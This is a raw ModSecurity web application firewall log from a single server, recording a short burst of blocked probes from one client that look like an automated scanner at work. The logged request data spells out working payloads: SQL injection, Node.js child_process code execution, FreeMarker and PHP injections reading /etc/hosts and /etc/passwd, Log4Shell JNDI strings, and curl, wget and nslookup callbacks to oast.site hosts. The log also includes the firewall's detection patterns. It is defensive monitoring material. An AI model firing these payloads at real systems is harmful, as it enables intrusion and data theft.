[Tue Aug 29 11:31:50.436902 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAQR48EAAAAz"]
[Tue Aug 29 11:31:50.442154 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAAQnF40AAAAF"]
[Tue Aug 29 11:31:51.307329 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAP@M3sAAAAZ"]
[Tue Aug 29 11:31:51.347768 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAP5mLYAAAAM"]
[Tue Aug 29 11:31:51.363858 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10t8Co-f0AAAP@M30AAAAZ"]
[Tue Aug 29 11:31:51.414227 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgybsmthftr7ii8.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgmui7igu8g1uzt.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10t8Co-f0AAAQQynAAAAAy"]
[Tue Aug 29 11:31:52.367268 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10uMCo-f0AAAQQynMAAAAy"]
[Tue Aug 29 11:31:52.534745 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlg3fd9zss4hcdmm.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlg8km5t766soew4.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10uMCo-f0AAAQQynkAAAAy"]
[Tue Aug 29 11:31:53.325745 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAP5mMAAAAAM"]
[Tue Aug 29 11:31:53.400276 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10ucCo-f0AAAQQyoEAAAAy"]
[Tue Aug 29 11:31:54.388370 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10usCo-f0AAAQSWPgAAAA0"]
[Tue Aug 29 11:31:55.393089 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10u8Co-f0AAAQV4Q0AAAA3"]
[Tue Aug 29 11:31:56.317290 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vMCo-f0AAAQJWycAAAAr"]
[Tue Aug 29 11:31:56.394889 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlg8nyxwh4is8wwh.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAQNwKoAAAAv"]
[Tue Aug 29 11:31:57.303804 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vcCo-f0AAAQV4RcAAAA3"]
[Tue Aug 29 11:31:58.301742 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vsCo-f0AAAPDoAcAAAAP"]
[Tue Aug 29 11:31:58.396057 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10vsCo-f0AAAQnF64AAAAF"]
[Tue Aug 29 11:31:59.338534 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10v8Co-f0AAAQkBaIAAAAC"]
[Tue Aug 29 11:31:59.342635 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlghx9ykrx4wa1xc.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAANWgWYAAAAG"]
[Tue Aug 29 11:32:04.483846 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAP5mN0AAAAM"]
[Tue Aug 29 11:32:06.391464 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xsCo-f0AAAQMrzkAAAAu"]
[Tue Aug 29 11:32:06.482624 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAQ83PsAAAAI"]
[Tue Aug 29 11:32:07.320215 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10x8Co-f0AAAQV4TIAAAA3"]
[Tue Aug 29 11:32:08.321659 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAQKOeYAAAAs"]
[Tue Aug 29 11:32:08.327598 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10yMCo-f0AAAP8G4AAAAAV"]
[Tue Aug 29 11:32:10.345281 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgtanzh9equbrb1.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAAP5mPEAAAAM"]
[Tue Aug 29 11:32:10.426858 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlg68mt5fpyyb8ma.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAAQNwNIAAAAv"]
[Tue Aug 29 11:32:12.355546 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAQ7NHMAAAAH"]
[Tue Aug 29 11:32:13.338569 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgwra3xpm8mnijn.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgwra3xpm8mnijn.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAQOv7EAAAAw"]
